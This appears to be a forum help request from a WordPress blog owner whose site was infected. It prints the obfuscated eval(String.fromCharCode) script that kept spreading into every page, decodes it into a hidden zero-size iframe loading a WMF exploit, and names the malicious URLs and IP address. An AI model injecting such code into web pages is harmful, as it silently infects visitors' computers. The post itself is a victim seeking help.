duvy

I have access to logs in ftp and logs in the user manager, not sure if they are raw or cleaned up for dummies. The exploit attack was wednesday and thursday. I was awake for 27 hours trying to find out how they did it. How should I send or show the logs? Would be grateful for any help.
my site is
https://www.darkfaeryglitter.org and wordpress is at
https://blog.darkfaeryglitter.org

So how exactly is it getting into my website? I’ve used hijack this and anti-virus software, three browsers, system restore, ad-aware, spybot and a few other programs and it isn’t showing on my harddrive or windows system files anywhere. IE hasn’t been changed on my PC at all. I was in the middle of writing a post when it started. ??

it does look like it’s gone down since a few hours ago but the image with the exploit in it is still there https://searchingwww.net/reverse_fun
try adding .wmf to the end of that url in place of .html and a graphic tries to download which is the actual exploit. This is what is popping up in my browser 82.179.170.11/dia489
and that site is still there.

yeah it looks blank if you don’t have a program to alert you that it is there. I get a warning in antivir that says the site is trying to install reverse_fun.wmf which is a known exploit/virus. If you view the source on that page it links to https:// cc.ad-ware .cc/dia489/ lau.jpg which is nothing also. If you have anti-virus software I suggest you update it and run it, just in case, because it installs seamlessly you won’t notice until it’s messing things up. I patched windows when the patch hit microsoft update and it still almost infected my PC. Could it have gotten into my database? I haven’t install a new copy of wordpress because if it’s in the database it will just start again and right now I have it contained. I’m not too good with mysql so i’m not sure how to check.
edit: if you are not sure please don’t follow that above image.

I’ve already cleaned it up twice, deleteing entire site, cleaning every file with multi-replace, checking them to make sure the code is gone from each page, restoring a backup, and it goes away, but then when I use the feature rich text editor, it starts again.
this is the code that was replicating into every php and html in my site

eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104,105,110,103,119,119,119,46,110,101,116,47,114,101,118,101,114,115,101,95,102,117,110,46,104,116,109,108,34,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101,62,39,41))

This is the code (translated):

Code:
‘document.write(\'<iframe src=”https://searchingwww.net/reverse_fun.html&#8221; height=0 width=0 border=0 frameborder=0></iframe>\’)’

now that I have removed tinymce completely it has stopped, but i’m worried that won’t stop this from happening in the future and maybe it is happening seamlessly to other sites, like i mentioned, I would not have detected it if I wasn’t using zone alarm/antivir, it would have slipped the file into my temporary internet folder without even asking me. Honestly, i have never had trouble with powweb until upgrading wordpress a few days ago. I’m not blaming wordpress or anything, just bots and hackers, but I like using tinymce and I want to block it, or get that site pulled so they can’t do it anymore. ?? Any suggestions?
thank for all your help!

edit: I also tested in 3 browsers and it it affected all of them, so it isn’t just IE.